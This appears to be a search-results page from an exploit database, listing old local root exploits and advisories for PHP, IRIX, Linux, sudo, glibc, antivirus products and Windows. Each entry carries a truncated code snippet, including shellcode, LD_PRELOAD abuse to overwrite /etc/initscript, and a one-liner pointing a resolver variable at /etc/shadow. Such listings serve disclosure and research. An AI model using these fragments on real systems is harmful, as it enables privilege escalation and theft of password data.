4067 matches found
PHP <= 4.4.6 / 5.2.1 array_user_key_compare() ZVAL dtor Local Exploit
No description provided by source. <?php ...
PHP <= 4.4.6 / 5.2.1 array_user_key_compare() ZVAL dtor Local Exploit
Exploit for linux platform in category local exploits. PHP <= 4.4.6 / 5.2.1 array_user_key_compare() ZVAL dtor Local Exploit <?php...
KLA10122 SB vulnerability in Comodo Firewall Pro
An unspecified vulnerability was found in Comodo Firewall Pro. By exploiting this vulnerability malicious users can bypass the driver protection for registry keys. This vulnerability can be exploited locally at a point related to OLE NamedPipe. Original advisories - Related products...
McAfee VirusScan for Mac (Virex) <= 7.7 Local Root Exploit
Exploit for macOS platform in category local exploits. McAfee VirusScan for Mac Virex \n\nTargets:\n\n"; foreach $key sortkeys %tgts $a,$b = split/:/,$tgts"$key"; print "\t$key . $a\n"; print "\n"; exit 1; $a,$b = split/:/,$tgts"$target";...
Plan 9 Kernel (devenv.c OTRUNC/pwrite) Local Exploit
Exploit for plan9 platform in category local exploits. Plan 9 Kernel devenv.c OTRUNC/pwrite Local Exploit / !!! DO NOT DISTRIBUTE !!! / / identity theft this exploit uses my devenv.c...
CVE-2007-0670
CVE-2007-0670 affects IBM AIX 5.2 and 5.3, where a buffer overflow in bos.rte.libc can be triggered by the r-commands (rdist, rsh, rcp, rsync, rlogin) to allow local users to execute arbitrary code. Root cause: insufficient bounds checking in bos.rte.libc. Impact: local code execution with partia...
Trend Micro VirusWall 3.81 - 'vscan/VSAPI' Local Buffer Overflow
/ Title: Local root exploit for vscan/VSAPI =Trend Micro VirusWall 3.81 on Linux Author: Sebastian Wolfgarten / http://www.devtarget.org Date: January 3rd, 2007 Severity: Medium Description: The product "InterScan VirusWall 3.81 for Linux" ships a library called...
Microsoft Visual C++ - '.RC Resource Files' Local Buffer Overflow
// // // Microsoft Visual C++ 6.0 SP6 resource compiler buffer overflow // vulnerability .rc resource files exploit // // vulnerability found / exploit built by porkythepig // // include "stdio.h" include "stdlib.h" include "memory.h" define STR01 "Microsoft Visual Studio 6.0 SP6 .rc PoC exploit ...
PT-2006-6799 · Freebsd · Ld.So
Name of the Vulnerable Software and Affected Versions: ld.so in FreeBSD, NetBSD, and possibly other BSD distributions (affected versions not specified). Description: The issue allows local users to gain privileges by passing certain environment variables to loading processes, as ld.so does not remov...
Kaspersky Internet Security 6.0.0.303 IOCTL KLICK Local Exploit
Exploit for unknown platform in category local exploits. Kaspersky Internet Security 6.0.0.303 IOCTL KLICK Local Exploit //////////////////////////////////// ///// AVP...
IRIX (5.3/6.2/6.3/6.4/6.5/6.5.11) /usr/lib/print/netprint Local Exploit
No description provided by source. !/bin/sh copyright LAST STAGE OF DELIRIUM jul 2000 poland ://lsd-pl.net/ /usr/lib/print/netprint This code gets released due to another post to the Bugtraq mailing list. For IRIX 6.3 and above this privilege escalation attack can be conducted by local lp users...
IRIX (5.3/6.2/6.3/6.4/6.5/6.5.11) /usr/bin/lpstat Local Exploit
No description provided by source. !/bin/sh copyright LAST STAGE OF DELIRIUM jul 2000 poland ://lsd-pl.net/ /usr/bin/lpstat EXECUTABLE=/usr/bin/lpstat FILE=file LIBRARY=lsd DIRECTORY=tmp cd $DIRECTORY cat $FILE 'EOF' HOSTNAME=localhost HOSTPRINTER=bzzz-z EOF echo NETTYPE=../../../../$DIRECTORY/ls...
IRIX /bin/login Local Buffer Overflow Exploit
No description provided by source. / /bin/login exploit by DCRH 24/5/97 Tested on: R3000 Indigo Irix 5.3 R4400 Indy Irix 5.3 R5000 O2 Irix 6.3 R8000 Power Challenge Irix 6.2 Compile as: cc -n32 login.c for Irix 6.x cc login.c for Irix 5.x Press enter when prompted for a password / include stdio.h...
xtokkaetama 1.0b Local Game Exploit (Red Hat 9.0)
No description provided by source. / xtokkaetama 1.0b local game exploit on Red Hat 9.0 Coded by brahma 31/07/2003 http://www.debian.org/security/2003/dsa-356 / include stdlib.h define RETADDR 0xbfffff11 define DEFAULTBUFFERSIZE 29 define DEFAULTEGGSIZE 512 define NOP 0x90 define BIN...
GLIBC 2.1.3 ld_preload Local Exploit
No description provided by source. !/bin/tcsh example of exploiting the hole in LDPRELOAD shadow tested on redhat 6.0, should work on others if -e /etc/initscript echo uwaga: /etc/initscript istnieje cd /lib umask 0 setenv LDPRELOAD libSegFault.so setenv SEGFAULTOUTPUTNAME /etc/initscript echo...
Linux Kernel 2.2.x - 2.4.x ptrace/kmod Local Root Exploit
No description provided by source. / Linux kernel ptrace/kmod local root exploit This code exploits a race condition in kernel/kmod.c, which creates kernel thread in insecure manner. This bug allows to ptrace cloned process, allowing to take control over privileged modprobe binary. Should work...
Sudo 1.3.1 - 1.6.8p Pathname Validation Local Root Exploit (openbsd)
No description provided by source. include stdio.h include stdlib.h include unistd.h include sysexits.h include sys/wait.h define SUDO "/usr/bin/sudo" ifdef BUFSIZ undef BUFSIZ define BUFSIZ 128 endif / ANY MODIFIED REPUBLISHING IS RESTRICTED OpenBSD sudo 1.3.1 - 1.6.8p local root exploit Tested...
Resolv+ (RESOLV_HOST_CONF) Linux Library Local Exploit
No description provided by source. setenv RESOLVHOSTCONF /etc/shadow; ping adfas...
Mandrake Linux 8.2 /usr/mail local exploit (d86mail.pl)
No description provided by source. !/usr/bin/perl Mandrake 8.2 /usr/mail local exploit Usage: perl d86mail.pl offset Then enter "." dot and press 'Enter' Example: satan@localhost my$ perl d86mail.pl eip: 0xbffffddd .enter Cc: too long to edit sh-2.05$ $shellcode = "\x31\xdb\x89\xd8\xb0\x17\xcd\x8...
MS Windows Improper Token Validation Local Exploit (working)
No description provided by source. / Removed include "stdafx.h" / str0ke / include stdio.h include windows.h define INFOBUFFERSIZE MAXCOMPUTERNAMELENGTH + 1 define PATHSIZE INFOBUFFERSIZE + MAXPATH + 4 typedef UINT WINAPI PFnMsiInstallProductLPCSTR szPackagePath, LPCSTR szCommandLine; int mainint...